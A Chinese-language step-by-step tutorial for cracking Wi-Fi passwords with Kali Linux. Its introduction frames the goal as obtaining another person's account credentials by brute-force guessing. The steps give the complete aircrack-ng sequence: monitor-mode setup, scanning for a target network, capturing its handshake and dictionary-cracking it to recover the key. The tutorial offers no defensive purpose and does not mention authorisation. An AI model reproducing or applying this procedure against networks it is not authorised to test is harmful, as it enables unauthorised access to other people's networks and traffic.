利用Kali Linux破解无线网密码

根据现有技术，如果想得到某个人的某个账户的用户名及密码，有两大类方法，一是渗透进入所在服务器的数据库，直接select提取，另一种就是暴力撞库，本篇所介绍的破解方法就是基于第二种的。

所谓撞库，通俗说就是一个一个的去试，直到将用户名和密码试出来，从理论上讲，只要我的数据字典足够大，就没有破解不了的字符形式的密码，注意，我说的是字符形式，所以，现在出现了生物学密码，比如指纹识别，虹膜识别等。但最终，生物学密码也是会以数据的形式存入数据库，所以，撞库是很牛逼的！

*本教程采用U盘安装方式，即将Kali Linux安装到U盘中，接入电脑后，从U盘启动进入系统

1.建立数据字典，我手机的wifi密码是qwertyuiop，为了简便，我的字典里也只设置这一个密码

2.将创建好的数据字典放到用户的根目录下

3.打开两个终端，这里我采用Terminator超级终端，为了易于分辨，上面的称为A端，下面的称为B端

4.查看无线网卡是否有效，在A端执行命令 iwconfig


5.开启无线网卡监听模式，在B端执行三条命令 
a.airmon-ng check


b.airmon-ng check kill


c.airmon-ng start wlan0


6.查看网卡状态，在A端执行命令 iwconfig


7.搜寻要破解的wifi名称，在B端执行命令 airodump-ng wlan0mon


8.探测到目标后，ctrl+c结束搜寻


9.记录BSSID和CH的数值，开始抓包，执行命令 airodump-ng --bssid "BSSID的值" --channel "CH的值" --write /root/"随意取个名字" wlan0mon

10.当B端出现握手包，停止抓包，开始破解，执行命令 aircrack-ng /root/"root下以*-01.cap结尾的文件全名" -w /root/"数据字典名称"

11.当出现KEY FOUND!【XXXXX】时，代表密码已经破解，中括号里的就是密码


12.破解结束